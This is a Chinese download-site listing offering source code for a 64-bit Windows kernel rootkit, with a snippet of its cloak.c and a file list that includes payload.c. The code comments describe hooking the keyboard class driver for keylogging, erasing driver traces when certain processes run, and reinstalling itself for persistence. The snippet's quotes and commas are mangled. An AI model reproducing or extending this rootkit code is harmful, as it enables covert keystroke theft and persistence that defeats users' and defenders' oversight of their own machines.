资源简介
德国人写的win64位RootKit源代码。
代码片段和文件信息
//!!!THIS CODE FULLY WORKING!!! SURE!!!!!!!!!!!!!!!!!!!!!!!!!!!!
#include “cloak.h“
#define TOUPPER_DELTA (‘a‘ - ‘A‘)
void PrepOnBoot(PVOID pParameter);
void PrepOnShutdown(PVOID pParameter);
void CreateRandName(PWCHAR pRandDrvName ULONG length);
BOOL mystrcmp(const WCHAR* prefix WCHAR* testStr ULONG lengthGiven PARSEMETHOD parseMethod){
lengthGiven >>= 1;
if ((NULL == prefix) || (NULL == testStr)){
return FALSE;
}
ULONG prefixLength = 0;
SIZE_T j = 0;
while (0 != prefix[prefixLength]){
prefixLength++;
}
if (prefixLength <= lengthGiven){
if (parseMethod == METHOD_END){
j = lengthGiven - prefixLength;
}
SIZE_T i = 0;
for (; j < lengthGiven - prefixLength + 1; j++){
for (i = 0; i < prefixLength; i++){
if ((testStr[i + j] > 64) && (testStr[i + j] < 91)){
if (prefix[i] != testStr[i + j] + (WCHAR)32){
break;
}
}
else{
if (prefix[i] != testStr[i + j]){
break;
}
}
}
if (i >= (prefixLength)){
return TRUE;
}
}
return FALSE;
}
return FALSE;
}
void InitThread(PVOID pStartContext){
DbgPrint(“Hello from InitThread“);
ExQueueWorkItem(pStartContext DelayedWorkQueue);
PsTerminateSystemThread(0x0);
}
///This is the main thread responsible for both cloaking and persistence.
///At the beginning we do some keylogger initialization.
///Then we check if any blacklisted processes are existing. If not we repeat until we detect a blacklisted
///process. If so all driver evidence will be deleted.
///Then we perform a passive wait on the first blacklisted process we find.
///Once the wait is satisfied (process terminated) we install us again in the system so we will be started at next boot.
void SenseThread(PVOID pStartContext){
UNREFERENCED_PARAMETER(pStartContext);
DbgPrint(“Hello from SenseThread“);
LARGE_INTEGER interval;
NTSTATUS ntstatus = STATUS_UNSUCCESSFUL;
PUNICODE_STRING pProcessName;
UNICODE_STRING uKbdDrvName;
PEPROCESS pEprocess;
PDRIVER_object pKbdDrvObj = NULL;
interval.QuadPart = -1500000;
InitializeListHead(&(g_pKbdHookInfo->queueListHead));
KeInitializeSpinLock(&(g_pKbdHookInfo->queueSpinLock));
KeInitializeSemaphore(&(g_pKbdHookInfo->queueSemaphore) 0 MAXLONG);
///Try to directly access the keyboard class driver
RtlInitUnicodeString(&uKbdDrvName L“\\Driver\\kbdclass“);
for (;;){
ntstatus = ObReferenceobjectByName(&uKbdDrvName OBJ_KERNEL_HANDLE | OBJ_CASE_INSENSITIVE NULL 0 IoDriverobjectType KernelMode NULL &pKbdDrvObj);
if (NT_SUCCESS(ntstatus)){
break;
}
KeDelayExecutionThread(KernelMode FALSE &interval);
}
BOOL isPatched = FALSE;
PETHREAD pEthread;
for (;;){
pEprocess = NULL;
pProcessName = NULL;
pEthread = NULL;
DbgPrint(“object not opened (0x%lX) starting next iteration.“ ntstatus);
///In our situation a polling approach is much easier than issuing a NtQuerySystemInformation call.
属性 大小 日期 时间 名称
----------- --------- ---------- ----- ----
文件 15664 2014-09-21 19:42 cloak.c
文件 153 2014-08-07 01:07 cloak.h
文件 82064 2014-09-21 20:00 drvtricks.h
文件 8380 2014-09-21 19:48 main.c
文件 12045 2014-09-21 19:56 payload.c
文件 311 2014-09-21 19:58 payload.h
- 上一篇:步进电机线速度控制官方源码+Datasheet
- 下一篇:成都光明玻璃库
相关资源
- 基于51单片机和LCD12864显示的多功能万
- adt-bundle-windows-x86_6420131030.txt
- ubuntu16.04 amd64 make deb安装包
- 64位的libmodbus3.1.6 源码+库
- SLE-15-SP2-Full-x86_64-GM-Media2.iso
- 整合32位、64位的win7到一个光盘ISO镜像
- 最新db2 V11.1试用版,for AIX ,for WIN6
- 基于51单片机的PG12864的电梯仿真
- centos-6.4-x86_64位百度云链接
- windows下的tftp服务器和客户端软件包含
- MB95F564开发模板代码
- stm32串行驱动12864字符,图片
- ICOFormat(32位+64位)
- sersync_installdir_64bit.zip
- cuda_11.1.0_456.43_win10.exe和cudnn-11.1-wind
- x64内存读写驱动
- SAS9.4 64bit软件破解版安装包百度云连
- STC15+AHT10温湿度传感器+LCD12864.rar
- CC2531 USB dongle 驱动 64位
- CH340G-CH340通用驱动 支持win10/win7 64位驱
- visio 2010 32位 64位 百度云地址
- pyHook-1.5.1-cp37-cp37m-win_amd64.whl
- CentOS-7-x86_64.cfg
- 64位Cygwin
- a4a957981f8dcf0175898b01a6478bfd.pdf
- CentOS-7-x86_64-DVD-1611.iso镜像
- lcd12864的文字取模软件
- Hadoop 2.7.4 Windows 7 64Bit 编译bin含winut
- 基于LCD12864的verilog代码
-
通过ba
se64上传图片到服务器并读取
评论
共有 条评论